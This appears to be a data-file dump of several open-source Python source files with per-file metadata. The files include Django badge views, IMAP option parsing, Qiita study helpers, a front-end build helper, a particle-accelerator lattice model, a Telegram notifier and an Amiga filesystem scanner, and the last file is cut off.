repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
guegue/forocacao
|
forocacao/users/views.py
|
1
|
3882
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import base64
from PIL import Image, ImageDraw, ImageFont
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.views.generic import DetailView, ListView, RedirectView, UpdateView
from braces.views import LoginRequiredMixin
from easy_thumbnails.files import get_thumbnailer
from .models import User
class UserBadgeJPEG(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
def get(self, request, username):
participant = self.get_object()
event = participant.event
img = Image.new('RGBA', (event.badge_size_x, event.badge_size_y), event.badge_color)
draw = ImageDraw.Draw(img)
match = {
'event': event.name,
'name': "%s %s" % (participant.first_name.partition(' ')[0], participant.last_name.partition(' ')[0] ),
'first_name': participant.first_name,
'last_name': participant.last_name,
'profession': participant.profession,
'country': participant.country.name,
'type': participant.type,
'email': participant.email,
}
for field in event.eventbadge_set.all():
x = field.x
y = field.y
size = field.size
if field.field == 'logo':
if participant.event.logo:
logo = Image.open(participant.event.logo.file.file)
logo.thumbnail((size,size))
img.paste(logo, (x,y))
elif field.field == 'photo':
if participant.photo:
photo = Image.open(participant.photo)
photo.thumbnail((size,size))
img.paste(photo, (x,y))
else:
if field.field == 'text':
content = field.format
else:
content = match[field.field]
fnt = ImageFont.truetype(field.font.filename, size)
color = field.color
draw.text((x,y), ("%s") % (content), font=fnt, fill=color)
response = HttpResponse(content_type="image/png")
img.save(response, "PNG")
return HttpResponse(response, content_type="image/png")
class UserBadgeView(LoginRequiredMixin, DetailView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
template_name = 'users/user_badge.html'
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
class UserUpdateView(LoginRequiredMixin, UpdateView):
fields = ['first_name', 'last_name', 'phone', 'activities' ] #FIXME : add all needed fields
# we already imported User in the view code above, remember?
model = User
# send the user back to their own page after a successful update
def get_success_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
def get_object(self):
# Only get the User record for the user making the request
return User.objects.get(username=self.request.user.username)
class UserListView(LoginRequiredMixin, ListView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
|
bsd-3-clause
| -8,969,089,653,582,079,000
| 34.290909
| 119
| 0.61154
| false
| 4.16971
| false
| false
| false
|
icgood/pymap
|
pymap/parsing/specials/options.py
|
1
|
5476
|
from __future__ import annotations
import re
from collections.abc import Iterable, Mapping
from typing import Optional
from . import AString, SequenceSet
from .. import Params, Parseable
from ..exceptions import NotParseable
from ..primitives import Number, List
from ...bytes import BytesFormat, rev
__all__ = ['ExtensionOption', 'ExtensionOptions']
class ExtensionOption(Parseable[bytes]):
"""Represents a single command option, which may or may not have an
associated value.
See Also:
`RFC 4466 2.1. <https://tools.ietf.org/html/rfc4466#section-2.1>`_
Args:
option: The name of the option.
arg: The option argument, if any.
"""
_opt_pattern = rev.compile(br'[a-zA-Z_.-][a-zA-Z0-9_.:-]*')
def __init__(self, option: bytes, arg: List) -> None:
super().__init__()
self.option = option
self.arg = arg
self._raw_arg: Optional[bytes] = None
@property
def value(self) -> bytes:
return self.option
def __bytes__(self) -> bytes:
if self.arg.value:
return BytesFormat(b'%b %b') % (self.option, self.raw_arg)
else:
return self.option
@property
def raw_arg(self) -> bytes:
if self._raw_arg is None:
if not self.arg:
self._raw_arg = b''
elif len(self.arg) == 1:
arg_0 = self.arg.value[0]
if isinstance(arg_0, (Number, SequenceSet)):
self._raw_arg = bytes(arg_0)
else:
self._raw_arg = bytes(self.arg)
else:
self._raw_arg = bytes(self.arg)
return self._raw_arg
@classmethod
def _parse_arg(cls, buf: memoryview, params: Params) \
-> tuple[List, memoryview]:
try:
num, buf = Number.parse(buf, params)
except NotParseable:
pass
else:
arg = List([num])
return arg, buf
try:
seq_set, buf = SequenceSet.parse(buf, params)
except NotParseable:
pass
else:
arg = List([seq_set])
return arg, buf
try:
params_copy = params.copy(list_expected=[AString, List])
return List.parse(buf, params_copy)
except NotParseable:
pass
return List([]), buf
@classmethod
def parse(cls, buf: memoryview, params: Params) \
-> tuple[ExtensionOption, memoryview]:
start = cls._whitespace_length(buf)
match = cls._opt_pattern.match(buf, start)
if not match:
raise NotParseable(buf[start:])
option = match.group(0).upper()
buf = buf[match.end(0):]
arg, buf = cls._parse_arg(buf, params)
return cls(option, arg), buf
class ExtensionOptions(Parseable[Mapping[bytes, List]]):
"""Represents a set of command options, which may or may not have an
associated argument. Command options are always optional, so the parsing
will not fail, it will just return an empty object.
See Also:
`RFC 4466 2.1. <https://tools.ietf.org/html/rfc4466#section-2.1>`_
Args:
options: The mapping of options to argument.
"""
_opt_pattern = re.compile(br'[a-zA-Z_.-][a-zA-Z0-9_.:-]*')
_empty: Optional[ExtensionOptions] = None
def __init__(self, options: Iterable[ExtensionOption]) -> None:
super().__init__()
self.options: Mapping[bytes, List] = \
{opt.option: opt.arg for opt in options}
self._raw: Optional[bytes] = None
@classmethod
def empty(cls) -> ExtensionOptions:
"""Return an empty set of command options."""
if cls._empty is None:
cls._empty = ExtensionOptions({})
return cls._empty
@property
def value(self) -> Mapping[bytes, List]:
return self.options
def has(self, option: bytes) -> bool:
return option in self.options
def get(self, option: bytes) -> Optional[List]:
return self.options.get(option, None)
def __bool__(self) -> bool:
return bool(self.options)
def __len__(self) -> int:
return len(self.options)
def __bytes__(self) -> bytes:
if self._raw is None:
parts = [ExtensionOption(option, arg)
for option, arg in sorted(self.options.items())]
self._raw = b'(' + BytesFormat(b' ').join(parts) + b')'
return self._raw
@classmethod
def _parse_paren(cls, buf: memoryview, paren: bytes) -> memoryview:
start = cls._whitespace_length(buf)
if buf[start:start + 1] != paren:
raise NotParseable(buf)
return buf[start + 1:]
@classmethod
def _parse(cls, buf: memoryview, params: Params) \
-> tuple[ExtensionOptions, memoryview]:
buf = cls._parse_paren(buf, b'(')
result: list[ExtensionOption] = []
while True:
try:
option, buf = ExtensionOption.parse(buf, params)
except NotParseable:
break
else:
result.append(option)
buf = cls._parse_paren(buf, b')')
return cls(result), buf
@classmethod
def parse(cls, buf: memoryview, params: Params) \
-> tuple[ExtensionOptions, memoryview]:
try:
return cls._parse(buf, params)
except NotParseable:
return cls.empty(), buf
|
mit
| 3,286,872,938,212,346,000
| 29.422222
| 76
| 0.56355
| false
| 3.976761
| false
| false
| false
|
squirrelo/qiita
|
qiita_ware/dispatchable.py
|
1
|
8731
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from .analysis_pipeline import RunAnalysis
from qiita_ware.commands import submit_EBI, submit_VAMPS
from qiita_db.analysis import Analysis
def submit_to_ebi(preprocessed_data_id, submission_type):
"""Submit a study to EBI"""
submit_EBI(preprocessed_data_id, submission_type, True)
def submit_to_VAMPS(preprocessed_data_id):
"""Submit a study to VAMPS"""
return submit_VAMPS(preprocessed_data_id)
def run_analysis(analysis_id, commands, comm_opts=None,
rarefaction_depth=None, merge_duplicated_sample_ids=False,
**kwargs):
"""Run an analysis"""
analysis = Analysis(analysis_id)
ar = RunAnalysis(**kwargs)
return ar(analysis, commands, comm_opts, rarefaction_depth,
merge_duplicated_sample_ids)
def create_raw_data(artifact_type, prep_template, filepaths, name=None):
"""Creates a new raw data
Needs to be dispachable because it moves large files
Parameters
----------
artifact_type: str
The artifact type
prep_template : qiita_db.metadata_template.prep_template.PrepTemplate
The template to attach the artifact
filepaths : list of (str, str)
The list with filepaths and their filepath types
name : str, optional
The name of the new artifact
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.artifact import Artifact
status = 'success'
msg = ''
try:
Artifact.create(filepaths, artifact_type, name=name,
prep_template=prep_template)
except Exception as e:
# We should hit this exception rarely (that's why it is an
# exception) since at this point we have done multiple checks.
# However, it can occur in weird cases, so better let the GUI know
# that this failed
return {'status': 'danger',
'message': "Error creating artifact: %s" % str(e)}
return {'status': status, 'message': msg}
def copy_raw_data(prep_template, artifact_id):
"""Creates a new raw data by copying from artifact_id
Parameters
----------
prep_template : qiita_db.metadata_template.prep_template.PrepTemplate
The template to attach the artifact
artifact_id : int
The id of the artifact to duplicate
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.artifact import Artifact
status = 'success'
msg = ''
try:
Artifact.copy(Artifact(artifact_id), prep_template)
except Exception as e:
# We should hit this exception rarely (that's why it is an
# exception) since at this point we have done multiple checks.
# However, it can occur in weird cases, so better let the GUI know
# that this failed
return {'status': 'danger',
'message': "Error creating artifact: %s" % str(e)}
return {'status': status, 'message': msg}
def delete_artifact(artifact_id):
"""Deletes an artifact from the system
Parameters
----------
artifact_id : int
The artifact to delete
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.artifact import Artifact
status = 'success'
msg = ''
try:
Artifact.delete(artifact_id)
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def create_sample_template(fp, study, is_mapping_file, data_type=None):
"""Creates a sample template
Parameters
----------
fp : str
The file path to the template file
study : qiita_db.study.Study
The study to add the sample template to
is_mapping_file : bool
Whether `fp` contains a mapping file or a sample template
data_type : str, optional
If `is_mapping_file` is True, the data type of the prep template to be
created
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
# The imports need to be in here because this code is executed in
# the ipython workers
import warnings
from os import remove
from qiita_db.metadata_template.sample_template import SampleTemplate
from qiita_db.metadata_template.util import load_template_to_dataframe
from qiita_ware.metadata_pipeline import (
create_templates_from_qiime_mapping_file)
status = 'success'
msg = ''
try:
with warnings.catch_warnings(record=True) as warns:
if is_mapping_file:
create_templates_from_qiime_mapping_file(fp, study,
data_type)
else:
SampleTemplate.create(load_template_to_dataframe(fp),
study)
remove(fp)
# join all the warning messages into one. Note that this
# info will be ignored if an exception is raised
if warns:
msg = '\n'.join(set(str(w.message) for w in warns))
status = 'warning'
except Exception as e:
# Some error occurred while processing the sample template
# Show the error to the user so they can fix the template
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def update_sample_template(study_id, fp):
"""Updates a sample template
Parameters
----------
study_id : int
Study id whose template is going to be updated
fp : str
The file path to the template file
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
import warnings
from os import remove
from qiita_db.metadata_template.util import load_template_to_dataframe
from qiita_db.metadata_template.sample_template import SampleTemplate
msg = ''
status = 'success'
try:
with warnings.catch_warnings(record=True) as warns:
# deleting previous uploads and inserting new one
st = SampleTemplate(study_id)
df = load_template_to_dataframe(fp)
st.extend(df)
st.update(df)
remove(fp)
# join all the warning messages into one. Note that this info
# will be ignored if an exception is raised
if warns:
msg = '\n'.join(set(str(w.message) for w in warns))
status = 'warning'
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def delete_sample_template(study_id):
"""Delete a sample template
Parameters
----------
study_id : int
Study id whose template is going to be deleted
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.metadata_template.sample_template import SampleTemplate
msg = ''
status = 'success'
try:
SampleTemplate.delete(study_id)
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def update_prep_template(prep_id, fp):
"""Updates a prep template
Parameters
----------
prep_id : int
Prep template id to be updated
fp : str
The file path to the template file
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
import warnings
from os import remove
from qiita_db.metadata_template.util import load_template_to_dataframe
from qiita_db.metadata_template.prep_template import PrepTemplate
msg = ''
status = 'success'
prep = PrepTemplate(prep_id)
try:
with warnings.catch_warnings(record=True) as warns:
df = load_template_to_dataframe(fp)
prep.extend(df)
prep.update(df)
remove(fp)
if warns:
msg = '\n'.join(set(str(w.message) for w in warns))
status = 'warning'
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
|
bsd-3-clause
| 4,269,830,663,802,809,300
| 28.59661
| 79
| 0.590654
| false
| 4.171524
| false
| false
| false
|
bepatient-fr/itools
|
itools/pkg/build_gulp.py
|
1
|
4272
|
# -*- coding: UTF-8 -*-
# Copyright (C) 2016 Sylvain Taverne <taverne.sylvain@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import from standard library
import sys
from subprocess import Popen
# Import from itools
from itools.fs.lfs import LocalFolder
from itools.uri import get_uri_name, Path
class GulpBuilder(object):
"""
Run "gulp build" in project's repository & add generated files
$ ui/{SKINS}/*
into the project MANIFEST file.
That allow to avoid commit compiled JS/CSS files into GIT.
"""
def __init__(self, package_root, worktree, manifest):
self.package_root = package_root
if self.package_root != '.':
self.ui_path = '{0}/ui/'.format(self.package_root)
else:
self.ui_path = 'ui/'
self.worktree = worktree
self.manifest = manifest
self.fs = LocalFolder('.')
if self.fs.is_folder(self.ui_path):
self.dist_folders = tuple(['{0}{1}'.format(self.ui_path, x)
for x in LocalFolder(self.ui_path).get_names()])
def run(self):
npm_done = self.launch_npm_install()
gulp_done = self.launch_gulp_build()
webpack_done = self.launch_webpack()
# Add DIST files into manifest
if (npm_done or gulp_done or webpack_done) and self.fs.exists(self.ui_path):
for path in self.fs.traverse(self.ui_path):
relative_path = self.fs.get_relative_path(path)
if (relative_path and
relative_path.startswith(self.dist_folders) and self.fs.is_file(path)):
self.manifest.add(relative_path)
def launch_npm_install(self):
done = False
for path in self.manifest:
filename = get_uri_name(path)
if filename == 'package.json':
print '***'*25
print '*** Run $ npm install on ', path
print '***'*25
path = str(Path(path)[:-1]) + '/'
p = Popen(['npm', 'install'], cwd=path)
p.wait()
if p.returncode == 1:
print '***'*25
print '*** Error running npm install ', path
print '***'*25
sys.exit(1)
done = True
return done
def launch_gulp_build(self):
done = False
for path in self.manifest:
filename = get_uri_name(path)
if filename == 'gulpfile.js':
print '***'*25
print '*** Run $ gulp build on ', path
print '***'*25
path = str(Path(path)[:-1]) + '/'
p = Popen(['gulp', 'build'], cwd=path)
p.wait()
if p.returncode == 1:
print '***'*25
print '*** Error running gulp ', path
print '***'*25
sys.exit(1)
done = True
return done
def launch_webpack(self):
done = False
for path in self.manifest:
filename = get_uri_name(path)
if filename == 'webpack.config.js':
print '***'*25
print '*** Run $ webpack ', path
print '***'*25
path = str(Path(path)[:-1]) + '/'
p = Popen(['webpack', '--mode=production'], cwd=path)
p.wait()
if p.returncode == 1:
print '***'*25
print '*** Error running webpack ', path
print '***'*25
sys.exit(1)
done = True
return done
|
gpl-3.0
| 1,900,275,981,483,111,000
| 34.6
| 91
| 0.526919
| false
| 4.111646
| false
| false
| false
|
lnls-fac/sirius
|
pymodels/TS_V03_03/lattice.py
|
1
|
10721
|
"""Lattice module.
In this module the lattice of the corresponding accelerator is defined.
"""
import math as _math
import numpy as _np
from pyaccel import lattice as _pyacc_lat, elements as _pyacc_ele, \
accelerator as _pyacc_acc, optics as _pyacc_opt
energy = 0.15e9 # [eV]
default_optics_mode = 'M1'
class LatticeError(Exception):
"""LatticeError class."""
def create_lattice(optics_mode=default_optics_mode):
"""Create lattice function."""
strengths, twiss_at_start = get_optics_mode(optics_mode)
# -- shortcut symbols --
marker = _pyacc_ele.marker
drift = _pyacc_ele.drift
quadrupole = _pyacc_ele.quadrupole
rbend_sirius = _pyacc_ele.rbend
hcorrector = _pyacc_ele.hcorrector
vcorrector = _pyacc_ele.vcorrector
# --- drift spaces ---
ldif = 0.1442
l015 = drift('l015', 0.1500)
l020 = drift('l020', 0.2000)
l025 = drift('l025', 0.2500)
l040 = drift('l040', 0.4000)
l060 = drift('l060', 0.6000)
l080 = drift('l080', 0.8000)
l090 = drift('l090', 0.9000)
l130 = drift('l130', 1.3000)
l220 = drift('l220', 2.2000)
l280 = drift('l280', 2.8000)
la2p = drift('la2p', 0.08323)
lb2p = drift('lb2p', 0.1330)
ld2p = drift('ld2p', 0.1920)
ld3p = drift('ld3p', 0.1430)
la3p = drift('la3p', 0.2320 - ldif)
lb1p = drift('lb1p', 0.2200 - ldif)
lb3p = drift('lb3p', 0.19897 - ldif)
lc1p = drift('lc1p', 0.18704 - ldif)
lc2p = drift('lc2p', 0.2260 - ldif)
ld1p = drift('ld1p', 0.21409 - ldif)
# --- markers ---
inicio = marker('start')
fim = marker('end')
# --- beam screens ---
scrn = marker('Scrn')
# --- beam current monitors ---
ict = marker('ICT')
fct = marker('FCT')
# --- beam position monitors ---
bpm = marker('BPM')
# --- correctors ---
ch = hcorrector('CH', 0.0)
cv = vcorrector('CV', 0.0)
# --- quadrupoles ---
qf1a = quadrupole('QF1A', 0.14, strengths['qf1a'])
qf1b = quadrupole('QF1B', 0.14, strengths['qf1b'])
qd2 = quadrupole('QD2', 0.14, strengths['qd2'])
qf2 = quadrupole('QF2', 0.20, strengths['qf2'])
qf3 = quadrupole('QF3', 0.20, strengths['qf3'])
qd4a = quadrupole('QD4A', 0.14, strengths['qd4a'])
qf4 = quadrupole('QF4', 0.20, strengths['qf4'])
qd4b = quadrupole('QD4B', 0.14, strengths['qd4b'])
# --- bending magnets ---
d2r = (_math.pi/180)
# -- b --
f = 5.011542/5.333333
h1 = rbend_sirius(
'B', 0.196, d2r*0.8597*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.163, -1.443, 0])*f)
h2 = rbend_sirius(
'B', 0.192, d2r*0.8467*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.154, -1.418, 0])*f)
h3 = rbend_sirius(
'B', 0.182, d2r*0.8099*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.140, -1.403, 0])*f)
h4 = rbend_sirius(
'B', 0.010, d2r*0.0379*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.175, -1.245, 0])*f)
h5 = rbend_sirius(
'B', 0.010, d2r*0.0274*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.115, -0.902, 0])*f)
h6 = rbend_sirius(
'B', 0.013, d2r*0.0244*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.042, -1.194, 0])*f)
h7 = rbend_sirius(
'B', 0.017, d2r*0.0216*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.008, -1.408, 0])*f)
h8 = rbend_sirius(
'B', 0.020, d2r*0.0166*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, 0.004, -1.276, 0])*f)
h9 = rbend_sirius(
'B', 0.030, d2r*0.0136*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, 0.006, -0.858, 0])*f)
h10 = rbend_sirius(
'B', 0.05, d2r*0.0089*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, 0.000, -0.050, 0])*f)
mbend = marker('mB')
bend = [h10, h9, h8, h7, h6, h5, h4, h3, h2, h1, mbend,
h1, h2, h3, h4, h5, h6, h7, h8, h9, h10]
# -- Thin Septum --
dip_nam = 'EjeSeptF'
dip_len = 0.5773
dip_ang = -3.6 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang/2, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
bejesf = marker('bEjeSeptF') # marker at the beginning of thin septum
mejesf = marker('mEjeSeptF') # marker at the center of thin septum
eejesf = marker('eEjeSeptF') # marker at the end of thin septum
ejesf = [bejesf, h1, mejesf, h2, eejesf]
# -- bo thick ejection septum --
dip_nam = 'EjeSeptG'
dip_len = 0.5773
dip_ang = -3.6 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
bejesg = marker('bEjeSeptG') # marker at the beginning of thick septum
mejesg = marker('mEjeSeptG') # marker at the center of thick septum
eejesg = marker('eEjeSeptG') # marker at the end of thick septum
ejesg = [bejesg, h1, mejesg, h2, eejesg]
# -- si thick injection septum (2 of these are used) --
dip_nam = 'InjSeptG'
dip_len = 0.5773
dip_ang = +3.6 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
binjsg = marker('bInjSeptG') # marker at the beginning of thick septum
minjsg = marker('mInjSeptG') # marker at the center of thick septum
einjsg = marker('eInjSeptG') # marker at the end of thick septum
injsg = [binjsg, h1, minjsg, h2, einjsg]
# -- si thin injection septum --
dip_nam = 'InjSeptF'
dip_len = 0.5773
dip_ang = +3.118 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
binjsf = marker('bInjSeptF') # marker at the beginning of thin septum
minjsf = marker('mInjSeptF') # marker at the center of thin septum
einjsf = marker('eInjSeptF') # marker at the end of thin septum
injsf = [binjsf, h1, minjsf, h2, einjsf]
# --- lines ---
sec01 = [
ejesf, l025, ejesg, l060, cv, l090, qf1a, la2p, ict, l280, scrn, bpm,
l020, ch, l020, qf1b, l020, cv, l020, la3p, bend]
sec02 = [
l080, lb1p, qd2, lb2p, l080, scrn, bpm, l020, qf2, l020, ch, l025, cv,
l015, lb3p, bend]
sec03 = [lc1p, l220, qf3, l025, scrn, bpm, l020, ch, l025, cv, lc2p, bend]
sec04 = [
ld1p, l130, qd4a, ld2p, l060, scrn, bpm, l020, cv, l025, ch, l020,
qf4, ld3p, l020, qd4b, l060, fct, l040, ict, l040, scrn, bpm, cv,
l020, injsg, l025, injsg, l025, injsf, scrn]
elist = [inicio, sec01, sec02, sec03, sec04, fim]
the_line = _pyacc_lat.build(elist)
# shifts model to marker 'start'
idx = _pyacc_lat.find_indices(the_line, 'fam_name', 'start')
the_line = _pyacc_lat.shift(the_line, idx[0])
lengths = _pyacc_lat.get_attribute(the_line, 'length')
for length in lengths:
if length < 0:
raise LatticeError('Model with negative drift!')
# sets number of integration steps
set_num_integ_steps(the_line)
# -- define vacuum chamber for all elements
the_line = set_vacuum_chamber(the_line)
return the_line, twiss_at_start
def get_optics_mode(optics_mode):
"""Return magnet strengths of a given opics mode."""
twiss_at_start = _pyacc_opt.Twiss.make_new(
beta=[9.321, 12.881], alpha=[-2.647, 2.000], etax=[0.231, 0.069])
# -- selection of optics mode --
if optics_mode == 'M1':
strengths = {
'qf1a': 1.70521151606,
'qf1b': 1.734817173998,
'qd2': -2.8243902951,
'qf2': 2.76086143922,
'qf3': 2.632182549934,
'qd4a': -3.048732667316,
'qf4': 3.613066375692,
'qd4b': -1.46213606815,
}
elif optics_mode == 'M2':
strengths = {
'qf1a': 1.670801801437,
'qf1b': 2.098494339697,
'qd2': -2.906779151209,
'qf2': 2.807031512313,
'qf3': 2.533815202102,
'qd4a': -2.962460334623,
'qf4': 3.537403658428,
'qd4b': -1.421177262593,
}
else:
_pyacc_acc.AcceleratorException(
'Invalid TS optics mode: ' + optics_mode)
return strengths, twiss_at_start
def set_num_integ_steps(the_line):
"""Set number of integration steps in each lattice element."""
for i, _ in enumerate(the_line):
if the_line[i].angle:
length = the_line[i].length
the_line[i].nr_steps = max(10, int(_math.ceil(length/0.035)))
elif the_line[i].polynom_b[1]:
the_line[i].nr_steps = 10
elif the_line[i].polynom_b[2]:
the_line[i].nr_steps = 5
else:
the_line[i].nr_steps = 1
def set_vacuum_chamber(the_line):
"""Set vacuum chamber for all elements."""
# -- default physical apertures --
for i, _ in enumerate(the_line):
the_line[i].hmin = -0.012
the_line[i].hmax = +0.012
the_line[i].vmin = -0.012
the_line[i].vmax = +0.012
# -- bo ejection septa --
beg = _pyacc_lat.find_indices(the_line, 'fam_name', 'bEjeSeptF')[0]
end = _pyacc_lat.find_indices(the_line, 'fam_name', 'eEjeSeptG')[0]
for i in range(beg, end+1):
the_line[i].hmin = -0.0150
the_line[i].hmax = +0.0150
the_line[i].vmin = -0.0040
the_line[i].vmax = +0.0040
# -- si thick injection septum --
beg = _pyacc_lat.find_indices(the_line, 'fam_name', 'bInjSeptG')[0]
end = _pyacc_lat.find_indices(the_line, 'fam_name', 'eInjSeptG')[0]
for i in range(beg, end+1):
the_line[i].hmin = -0.0045
the_line[i].hmax = +0.0045
the_line[i].vmin = -0.0035
the_line[i].vmax = +0.0035
# -- si thin injection septum --
beg = _pyacc_lat.find_indices(the_line, 'fam_name', 'bInjSeptF')[0]
end = _pyacc_lat.find_indices(the_line, 'fam_name', 'eInjSeptF')[0]
for i in range(beg, end+1):
the_line[i].hmin = -0.0150
the_line[i].hmax = +0.0150
the_line[i].vmin = -0.0035
the_line[i].vmax = +0.0035
return the_line
|
mit
| -4,336,585,749,294,970,400
| 33.583871
| 78
| 0.544819
| false
| 2.336239
| false
| false
| false
|
toshka/torrt
|
torrt/notifiers/telegram.py
|
1
|
1820
|
import logging
import requests
from requests import RequestException
from torrt.base_notifier import BaseNotifier
from torrt.utils import NotifierClassesRegistry
LOGGER = logging.getLogger(__name__)
class TelegramNotifier(BaseNotifier):
"""Telegram bot notifier. See instructions how to create bot at https://core.telegram.org/bots/api"""
alias = 'telegram'
url = 'https://api.telegram.org/bot'
def __init__(self, token, chat_id):
"""
:param token: str - Telegram's bot token
:param chat_id: str - Telegram's chat ID
"""
self.token = token
self.chat_id = chat_id
def make_message(self, torrent_data):
return '''The following torrents were updated:\n%s''' \
% '\n'.join(map(lambda t: t['name'], torrent_data.values()))
def test_configuration(self):
url = '%s%s/getMe' % (self.url, self.token)
r = requests.get(url)
return r.json().get('ok', False)
def send_message(self, msg):
url = '%s%s/sendMessage' % (self.url, self.token)
try:
response = requests.post(url, data={'chat_id': self.chat_id, 'text': msg})
except RequestException as e:
LOGGER.error('Failed to send Telegram message: %s', e)
else:
if response.ok:
json_data = response.json()
if json_data['ok']:
LOGGER.debug('Telegram message was sent to user %s', self.chat_id)
else:
LOGGER.error('Telegram notification not send: %s', json_data['description'])
else:
LOGGER.error('Telegram notification not send. Response code: %s (%s)',
response.status_code, response.reason)
NotifierClassesRegistry.add(TelegramNotifier)
|
bsd-3-clause
| -1,036,498,508,307,981,600
| 34
| 105
| 0.593407
| false
| 3.947939
| false
| false
| false
|
alpine9000/amiga_examples
|
tools/external/amitools/amitools/fs/validate/DirScan.py
|
1
|
6864
|
from BlockScan import BlockScan
from amitools.fs.FSString import FSString
from amitools.fs.FileName import FileName
from amitools.fs.validate.Log import Log
import amitools.fs.DosType as DosType
class DirChainEntry:
"""entry of the hash chain"""
def __init__(self, blk_info):
self.blk_info = blk_info
self.parent_ok = False
self.fn_hash_ok = False
self.valid = False
self.end = False
self.orphaned = False
self.sub = None
def __str__(self):
l = []
if self.parent_ok:
l.append("parent_ok")
if self.fn_hash_ok:
l.append("fn_hash_ok")
if self.valid:
l.append("valid")
if self.end:
l.append("end")
if self.orphaned:
l.append("orphaned")
return "[DCE @%d '%s': %s]" % \
(self.blk_info.blk_num, self.blk_info.name, " ".join(l))
class DirChain:
"""representing a chain of the hashtable in a directory"""
def __init__(self, hash_val):
self.hash_val = hash_val
self.chain = []
def add(self, dce):
self.chain.append(dce)
def get_entries(self):
return self.chain
def __str__(self):
return "{DirChain +%d: #%d}" % (self.hash_val, len(self.chain))
class DirInfo:
"""information structure on a directory"""
def __init__(self, blk_info):
self.blk_info = blk_info
self.chains = {}
self.children = []
def add(self, dc):
self.chains[dc.hash_val] = dc
def add_child(self, c):
self.children.append(c)
def get(self, hash_val):
if hash_val in self.chains:
return self.chains[hash_val]
else:
return None
def get_chains(self):
return self.chains
def __str__(self):
bi = self.blk_info
blk_num = bi.blk_num
name = bi.name
parent_blk = bi.parent_blk
